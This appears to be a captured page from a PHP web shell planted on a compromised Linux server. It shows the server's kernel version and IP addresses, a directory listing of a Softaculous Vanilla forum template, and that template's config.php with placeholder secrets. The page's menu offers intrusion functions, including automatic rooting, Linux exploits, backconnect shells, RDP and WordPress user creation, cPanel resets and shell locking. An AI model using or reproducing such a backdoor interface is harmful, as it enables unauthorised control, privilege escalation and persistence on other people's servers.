Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.137.175.166
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
vanilla /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
6.27
KB
-rw-r--r--
config.php
2.26
KB
-rw-r--r--
edit.php
5.99
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
16.85
KB
-rw-r--r--
fileindex.php
212
B
-rw-r--r--
import.php
3.14
KB
-rw-r--r--
info.xml
3.11
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
7.63
KB
-rw-r--r--
install.xml
734
B
-rw-r--r--
md5
7.14
KB
-rw-r--r--
notes.txt
957
B
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
update_pass_231.php
6.66
KB
-rw-r--r--
upgrade.php
5.93
KB
-rw-r--r--
upgrade.xml
367
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php if (!defined('APPLICATION')) exit(); // Context $Configuration['Context']['Secret'] = '[[context_secret]]'; // Database $Configuration['Database']['Name'] = '[[softdb]]'; $Configuration['Database']['Host'] = '[[softdbhost]]'; $Configuration['Database']['User'] = '[[softdbuser]]'; $Configuration['Database']['Password'] = '[[softdbpass]]'; // EnabledApplications $Configuration['EnabledApplications']['Conversations'] = 'conversations'; $Configuration['EnabledApplications']['Vanilla'] = 'vanilla'; // EnabledPlugins $Configuration['EnabledPlugins']['recaptcha'] = true; $Configuration['EnabledPlugins']['GettingStarted'] = 'GettingStarted'; $Configuration['EnabledPlugins']['stubcontent'] = true; $Configuration['EnabledPlugins']['swagger-ui'] = true; $Configuration['EnabledPlugins']['Quotes'] = false; $Configuration['EnabledPlugins']['rich-editor'] = true; // Garden $Configuration['Garden']['Title'] = '[[site_name]]'; $Configuration['Garden']['Cookie']['Salt'] = '[[salt]]'; $Configuration['Garden']['Cookie']['Domain'] = ''; $Configuration['Garden']['Registration']['ConfirmEmail'] = true; $Configuration['Garden']['Email']['SupportName'] = '[[site_name]]'; $Configuration['Garden']['Email']['Format'] = 'text'; $Configuration['Garden']['SystemUserID'] = '1'; $Configuration['Garden']['UpdateToken'] = '[[UpdateToken]]'; $Configuration['Garden']['InputFormatter'] = 'rich'; $Configuration['Garden']['Themes']['Visible'] = 'theme-foundation'; $Configuration['Garden']['Version'] = 'Undefined'; $Configuration['Garden']['CanProcessImages'] = true; $Configuration['Garden']['MobileInputFormatter'] = 'rich'; $Configuration['Garden']['Installed'] = true; // Plugins $Configuration['Plugins']['GettingStarted']['Dashboard'] = '1'; // RichEditor $Configuration['RichEditor']['Quote']['Enable'] = true; // Routes $Configuration['Routes']['YXBwbGUtdG91Y2gtaWNvbi5wbmc='] = array ( 0 => 'utility/showtouchicon', 1 => 'Internal', ); $Configuration['Routes']['cm9ib3RzLnR4dA=='] = array ( 0 => '/robots', 1 => 'Internal', ); $Configuration['Routes']['dXRpbGl0eS9yb2JvdHM='] = array ( 0 => '/robots', 1 => 'Internal', ); $Configuration['Routes']['Y29udGFpbmVyLmh0bWw='] = array ( 0 => 'staticcontent/container', 1 => 'Internal', ); $Configuration['Routes']['DefaultController'] = 'discussions';
Close